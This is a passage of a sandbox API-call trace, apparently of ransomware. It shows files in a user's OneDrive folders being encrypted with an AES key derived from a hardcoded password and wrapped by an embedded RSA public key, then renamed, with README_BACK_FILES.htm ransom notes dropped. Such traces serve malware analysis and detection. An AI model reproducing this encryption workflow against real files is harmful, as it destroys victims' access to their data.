lpOverlapped=0x0) returned 1 [0271.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.492] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.492] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.493] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.493] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.493] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.493] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2c0, lpOverlapped=0x0) returned 1 [0271.493] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2c0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0271.493] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0271.493] CloseHandle (hObject=0x5d3c) returned 1 [0271.493] CloseHandle (hObject=0x5d4c) returned 1 [0271.493] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.499] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.500] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.501] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.503] CryptDestroyHash (hHash=0x2fa748) returned 1 [0271.503] CryptDestroyKey (hKey=0x2fa208) returned 1 [0271.503] CryptReleaseContext (hProv=0x2f283a8, dwFlags=0x0) returned 1 [0271.503] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.503] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0271.503] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\readme_back_files.htm")) returned 0xffffffff [0271.503] AreFileApisANSI () returned 1 [0271.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0271.504] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.505] GetFileType (hFile=0x5d48) returned 0x1 [0271.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.506] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.506] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0271.507] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.507] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.507] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0271.507] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\km-kh\\readme_back_files.htm")) returned 0xffffffff [0271.507] AreFileApisANSI () returned 1 [0271.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0271.507] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\km-kh\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.509] GetFileType (hFile=0x5d48) returned 0x1 [0271.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.514] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0271.514] FindClose (in: hFindFile=0x2fa488 | out: hFindFile=0x2fa488) returned 1 [0271.514] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\readme_back_files.htm")) returned 0xffffffff [0271.514] AreFileApisANSI () returned 1 [0271.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28894e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0271.514] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0271.515] GetFileType (hFile=0x5d44) returned 0x1 [0271.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0271.517] FindNextFileA (in: hFindFile=0x2fa7c8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0271.517] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2fa488 [0271.517] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.529] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.530] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.530] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0271.539] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.539] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.539] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.539] GetLastError () returned 0x0 [0271.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml")) returned 0x20 [0271.541] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml", dwFileAttributes=0x80) returned 1 [0271.542] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.543] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.545] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml.gsg", dwFileAttributes=0x2) returned 1 [0271.545] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0271.547] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.547] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.547] CryptHashData (hHash=0x2fa748, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.547] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa208) returned 1 [0271.548] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.548] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.548] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f27ff0) returned 1 [0271.548] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27ff0, dwCertEncodingType=0x1, pInfo=0x2f32020*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32050*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32058*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fad08) returned 1 [0271.548] CryptEncrypt (in: hKey=0x2fad08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.548] CryptEncrypt (in: hKey=0x2fad08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28870*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28870*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.548] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f28870*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28870*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.564] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.564] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.572] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.573] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.573] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.573] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.573] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.573] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.574] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.574] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 